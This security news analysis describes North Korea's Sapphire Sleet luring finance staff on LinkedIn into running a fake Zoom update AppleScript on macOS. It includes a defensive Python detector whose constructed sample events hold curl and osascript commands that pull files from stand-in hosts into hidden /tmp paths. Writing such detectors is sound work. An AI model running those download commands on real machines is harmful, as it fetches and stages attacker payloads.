
North Korea Targets macOS Users in Latest Heist
Why It Matters
The breach jeopardizes high‑value financial accounts and demonstrates that macOS is no longer a low‑risk target, forcing enterprises to rethink user‑centric security controls. It also underscores the need for coordinated vendor responses to rapidly emerging threats.
Key Takeaways
- Sapphire Sleet uses a fake Zoom update AppleScript to deliver malware
- The attack starts with LinkedIn recruiter scams targeting finance professionals
- The malicious script fetches payloads via curl, stealing credentials and crypto
- Apple deployed Safari Safe Browsing and XProtect signatures automatically
- User education on unsolicited software requests is a critical defense
Pulse Analysis
The latest Sapphire Sleet operation marks a notable shift in the threat landscape, as North Korean actors move beyond Windows‑centric attacks to target macOS users. By disguising a malicious AppleScript as a Zoom SDK update, the group leverages the platform’s native scripting environment to bypass traditional antivirus defenses. The initial social‑engineering vector, fabricated recruiter outreach on LinkedIn, targets finance professionals who are prime holders of cryptocurrency assets, making the lure both credible and financially rewarding for the attackers.
State‑sponsored groups like Lazarus have refined their playbook over years, combining low‑cost human manipulation with sophisticated multi‑stage payload delivery. The use of native macOS tools such as `softwareupdate`, `curl`, and `osascript` allows the malware to blend in with legitimate system processes, while dynamic payload fetching evades static signature detection. This approach reflects a broader trend where adversaries weaponize trusted development ecosystems, forcing defenders to adopt behavior‑based monitoring and deeper telemetry on script execution.
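The behaviour‑based monitoring described above can be illustrated with a small detector over process‑execution telemetry. This is an added example, not code from the page, from Apple, or from any EDR vendor: the event schema (pid, ppid, path, argv), the sample events and the `.invalid` URLs are all constructed, and the two rules (a script host such as `osascript` anywhere in the ancestry of a `curl` process, and an inline AppleScript whose `do shell script` invokes `curl`) are this author's heuristics for the living‑off‑the‑land chain the analysis describes, not a signature from any product.

```python
"""Toy behavioural detector for the osascript -> curl pattern.

Added example; the ProcEvent schema is an assumption and the sample
events below are constructed, not real telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Native tools the analysis says the malware blends in with
SCRIPT_HOSTS = {"/usr/bin/osascript"}
DOWNLOADERS = {"/usr/bin/curl"}

# Inline AppleScript that shells out to curl, e.g. osascript -e 'do shell script "curl ..."'
INLINE_FETCH = re.compile(r'do shell script\s+"[^"]*\bcurl\b', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """One process-execution record (constructed schema, not a real EDR format)."""
    pid: int
    ppid: int
    path: str
    argv: tuple[str, ...]


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    chain: tuple[str, ...]  # binaries from the script host down to the flagged process


def lineage(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    """Walk parents up to the root (or an unknown/cyclic ppid); root comes first."""
    chain = [ev]
    seen = {ev.pid}
    cur = ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return list(reversed(chain))


def detect(events: Iterable[ProcEvent]) -> list[Finding]:
    """Return one Finding per event that matches a rule; benign curl use is left alone."""
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for ev in by_pid.values():
        chain = lineage(ev, by_pid)
        names = tuple(p.path for p in chain)
        # Rule 1: a script host sits somewhere above a downloader process
        host_idx = next((i for i, p in enumerate(chain) if p.path in SCRIPT_HOSTS), None)
        if host_idx is not None and ev.path in DOWNLOADERS:
            findings.append(Finding(ev.pid, "osascript_spawned_curl", names[host_idx:]))
        # Rule 2: osascript given an inline script that shells out to curl
        if ev.path in SCRIPT_HOSTS and any(INLINE_FETCH.search(a) for a in ev.argv):
            findings.append(Finding(ev.pid, "inline_applescript_fetch", names))
    return findings


# Constructed sample telemetry: one benign update check and two suspicious chains
SAMPLE_EVENTS = [
    # Benign: the Zoom client itself fetching an update (no script host in the lineage)
    ProcEvent(100, 1, "/Applications/zoom.us.app/Contents/MacOS/zoom.us", ("zoom.us",)),
    ProcEvent(101, 100, "/usr/bin/curl", ("curl", "https://updates.example/zoom")),
    # Suspicious: Terminal -> osascript running a "Zoom SDK update" script -> sh -> curl
    ProcEvent(200, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", ("Terminal",)),
    ProcEvent(201, 200, "/usr/bin/osascript", ("osascript", "/Users/alice/Downloads/zoom_sdk_update.scpt")),
    ProcEvent(202, 201, "/bin/sh", ("sh", "-c", "curl -fsSL https://payload.invalid/u -o /tmp/.u")),
    ProcEvent(203, 202, "/usr/bin/curl", ("curl", "-fsSL", "https://payload.invalid/u", "-o", "/tmp/.u")),
    # Suspicious: inline AppleScript that calls curl directly
    ProcEvent(300, 1, "/usr/bin/osascript",
              ("osascript", "-e", 'do shell script "curl -s https://payload.invalid/q -o /tmp/.q"')),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} chain={' -> '.join(f.chain)}")
```

Run as‑is and the benign Zoom update check (pid 101) produces nothing, while the scripted chain is reported once at the `curl` leaf with its full `osascript -> sh -> curl` ancestry and the inline `-e` variant is reported at the `osascript` process itself. In a real deployment the lineage walk would run over Endpoint Security or EDR process events rather than a static list, and the rule set would be widened to the other tools named above (for example `softwareupdate` invoked from a script host).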
Apple’s rapid rollout of Safari Safe Browsing filters and XProtect signatures demonstrates the importance of vendor collaboration in mitigating zero‑day campaigns. However, technical controls alone cannot eliminate the risk; organizations must reinforce security awareness, especially around unsolicited software requests on professional networks. Regular training, strict script execution policies, and centralized approval workflows for remote‑support tools are essential safeguards. As attackers continue to weaponize everyday collaboration platforms, a layered defense that blends technology with human vigilance will be the most effective countermeasure.